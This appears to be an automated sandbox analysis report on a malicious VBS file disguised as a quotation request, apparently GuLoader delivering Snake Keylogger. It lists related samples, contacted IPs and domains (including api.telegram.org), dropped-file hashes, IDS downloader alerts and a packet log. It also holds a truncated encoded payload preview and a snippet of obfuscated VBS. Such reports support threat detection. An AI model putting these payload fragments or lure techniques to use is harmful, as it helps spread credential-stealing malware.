                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 193.122.130.0
                                                                69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 132.226.247.73
                                                                rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.130.0
                                                                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.6.168
                                                                eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                api.telegram.orgCircular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 149.154.167.220
                                                                RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 149.154.167.220
                                                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 149.154.167.220
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ORACLE-BMC-31898USla.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                • 193.123.253.227
                                                                la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                • 193.123.29.81
                                                                la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                • 130.61.64.122
                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                • 129.148.139.83
                                                                arm.elfGet hashmaliciousUnknownBrowse
                                                                • 150.136.80.212
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 193.122.6.168
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 193.122.130.0
                                                                rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.130.0
                                                                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                • 158.101.44.242
                                                                Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.130.0
                                                                TELEGRAMRUCircular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 149.154.167.220
                                                                RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 149.154.167.220
                                                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 149.154.167.220
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                CLOUDFLARENETUSUrgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                • 172.67.206.204
                                                                Inova oferta nr F01281624PL.htmlGet hashmaliciousUnknownBrowse
                                                                • 1.1.1.1
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 172.67.206.204
                                                                VY871GcABT.exeGet hashmaliciousDCRatBrowse
                                                                • 188.114.96.3
                                                                01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                • 188.114.97.3
                                                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                • 8.46.4.155
                                                                Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.78.104
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                54328bd36c14bd82ddaa0c04b25ed9adWBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.97.3
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                3b5074b1b5d032e5620f69f9f700ff0eUrgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                Douglas County Government.pdfGet hashmaliciousHtmlDropperBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                https://t.ly/2jKWOGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                http://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                Play_VM.Now.matt.sibilo_Audio.wav...v.htmlGet hashmaliciousHtmlDropperBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                https://dca13.z4.web.core.windows.net/werrx01USAHTML/?bcda=1-877-883-8072#Get hashmaliciousTechSupportScamBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbsGet hashmaliciousUnknownBrowse
                                                                • 142.250.185.78
                                                                • 149.154.167.220
                                                                • 142.250.185.65
                                                                37f463bf4616ecd445d4a1937da06e19Monetary_002993034958293.jsGet hashmaliciousUnknownBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                xxJfSec58P.exeGet hashmaliciousVidarBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                • 216.58.206.78
                                                                • 142.250.185.65
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.8908305915084105
                                                                Encrypted:false
                                                                SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:@...e.................................X..............@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):451208
                                                                Entropy (8bit):5.970456791550823
                                                                Encrypted:false
                                                                SSDEEP:6144:RE9Sdeo+va7jC6bWWZghnWsSzltdb/JHnSnR8Hg5IQdVN90MYWojvwHx1XIi:C9Cj12N5ShPhSRcgpdj4Wojq
                                                                MD5:6771CD798C1DF9B5EDDC60071DFC6E15
                                                                SHA1:65E923600E1C2604D90A481D257DC99C23FBF1DD
                                                                SHA-256:0849655061E0CE5F5F2633E43EF08A62A3482CF9F15BAF24FBD6B25F8ABAD95F
                                                                SHA-512:CF0013A56EF6AB5FB48DDD80D3E94B879B6890586A5E11313C66B35C352111D3FFF2D21A9F9E42A4163CF4E05419610A696E5D428A32EACB45D6F4103B9085EE
                                                                Malicious:false
                                                                Preview:6wLJLXEBm7u8VBgA6wK3Q3EBmwNcJARxAZvrAo4guT+Lm/RxAZvrAqOvgcHc7R7QcQGbcQGbgekbebrEcQGb6wJf7+sCxyZxAZu6LOy6MOsCWnHrAoyI6wJDAXEBmzHKcQGbcQGbiRQLcQGb6wLnM9HicQGb6wIBT4PBBHEBm+sCgSyB+QQe3QR8zOsCnNhxAZuLRCQE6wJBaXEBm4nDcQGb6wIvIIHDcId1AnEBm3EBm7rng/OtcQGbcQGbgfJpW8AzcQGbcQGbgcJyJ8xhcQGb6wLJhHEBm3EBm+sCOoJxAZuLDBDrAjcR6wIIdokME+sCYq/rAsJGQnEBm3EBm4H6RLMEAHXUcQGb6wJegYlcJAzrAsOccQGbge0AAwAAcQGb6wLpYotUJAhxAZtxAZuLfCQE6wIrCnEBm4nr6wJo5nEBm4HDnAAAAOsCZkBxAZtT6wKAiOsCsdlqQOsCbWVxAZuJ63EBm3EBm8eDAAEAAACA+ATrAhMQcQGbgcMAAQAAcQGbcQGbU3EBm+sCa8mJ6+sCtInrAmuzibsEAQAAcQGb6wKmbIHDBAEAAOsCIobrAq6WU3EBm+sCQalq/3EBm3EBm4PCBXEBm3EBmzH26wLw7esCpgkxyXEBm+sC3MSLGnEBm3EBm0FxAZtxAZs5HAp19OsCf15xAZtG6wK5tXEBm4B8Cvu4dd7rAtwlcQGbi0QK/HEBm3EBmynwcQGb6wL1Nv/S6wIvx+sCita6RLMEAHEBm+sCTSwxwHEBm3EBm4t8JAxxAZtxAZuBNAce9exDcQGbcQGbg8AEcQGbcQGbOdB15usCxYrrApF6ifvrAiOqcQGb/9dxAZvrAkig9vXsQx4DKARFk2mZJgJlptlwh7zhCm/lHG1t9nUKE7ySEgDPn1iHvOEKJEEDtG32dQoTvFnIPZBSCmEo4QoTNumgZaan3a/3fXQSdZXLl8LfFhGZqXQdpZyMyyWbN4p61HQFlt0D0HvikxuB
                                                                File type:ASCII text, with CRLF line terminators
                                                                Entropy (8bit):4.886610114491044
                                                                TrID:
                                                                • Visual Basic Script (13500/0) 100.00%
                                                                File name:RFQ_64182MR_PDF.R00.vbs
                                                                File size:538'093 bytes
                                                                MD5:63a5b7d958f537744c5330b3fef8ccac
                                                                SHA1:00ba79f887c403afabdd6ffe21db30e82288f84b
                                                                SHA256:ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286
                                                                SHA512:3e7dd82783ffc59320bcdef7942d9b2e7de31cb40dd1c7597d5b17895e6c695888b4791b8191f80aedc0f1fe053d05785681844cf1c1cb0d16158411bffd7909
                                                                SSDEEP:6144:Zf/7gXsuuCdsOQpE4V+iZeCKnoQLirdqJGfimOWIVV8T6Oj+WqXZQRhmxCDf2Nzv:u66sOQ66MfiZqbm3eVpZxxCTagc7og
                                                                TLSH:70B42975DE640AA64E8B279AFC409E81C5BCD5051A2710F5FFDB0B4D600ACACE3FD269
                                                                File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla
                                                                Icon Hash:68d69b8f86ab9a86
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-24T08:43:16.923734+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449741216.58.206.78443TCP
                                                                2024-10-24T08:43:22.914100+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449768193.122.6.16880TCP
                                                                2024-10-24T08:43:24.899602+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449768193.122.6.16880TCP
                                                                2024-10-24T08:43:25.444901+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449790188.114.97.3443TCP
                                                                2024-10-24T08:43:26.414108+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449793193.122.6.16880TCP
                                                                2024-10-24T08:43:30.303761+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449821188.114.97.3443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 24, 2024 08:42:24.817096949 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:24.817183018 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:24.817261934 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:24.824208975 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:24.824276924 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.004039049 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.004218102 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:26.005100012 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.005161047 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:26.008825064 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:26.008837938 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.009167910 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.021877050 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:26.067363024 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.377573013 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.429547071 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:26.429600000 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.447537899 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:26.447681904 CEST44349730142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:26.447741985 CEST49730443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:30.607906103 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:30.607965946 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:30.608216047 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:30.608372927 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:30.608385086 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.474539995 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.474744081 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:31.475642920 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.475733995 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:31.477230072 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:31.477247953 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.477592945 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.478741884 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:31.519344091 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.836226940 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.836657047 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:31.836711884 CEST44349731142.250.185.78192.168.2.4
                                                                Oct 24, 2024 08:42:31.836774111 CEST49731443192.168.2.4142.250.185.78
                                                                Oct 24, 2024 08:42:31.837532997 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:31.837588072 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:31.837662935 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:31.837902069 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:31.837913036 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:32.720714092 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:32.720849037 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:32.723877907 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:32.723898888 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:32.724327087 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:32.725265026 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:32.767338037 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.103568077 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.103748083 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.112042904 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.112133026 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.221190929 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.221307993 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.221330881 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.226459980 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.226502895 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.226533890 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.226556063 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.226594925 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.231684923 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.238360882 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.238429070 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.238445044 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.288954020 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.288980007 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.335849047 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.339046001 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.339159012 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.339196920 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.339230061 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.339253902 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.339277983 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.339323997 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.340864897 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.340929985 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.340945959 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.347373962 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.347558975 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.347573996 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.356138945 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.356180906 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.356256962 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.356290102 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.356350899 CEST49732443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:42:36.456624985 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.456716061 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.456765890 CEST44349732142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:42:36.456774950 CEST49732443192.168.2.4142.250.185.65
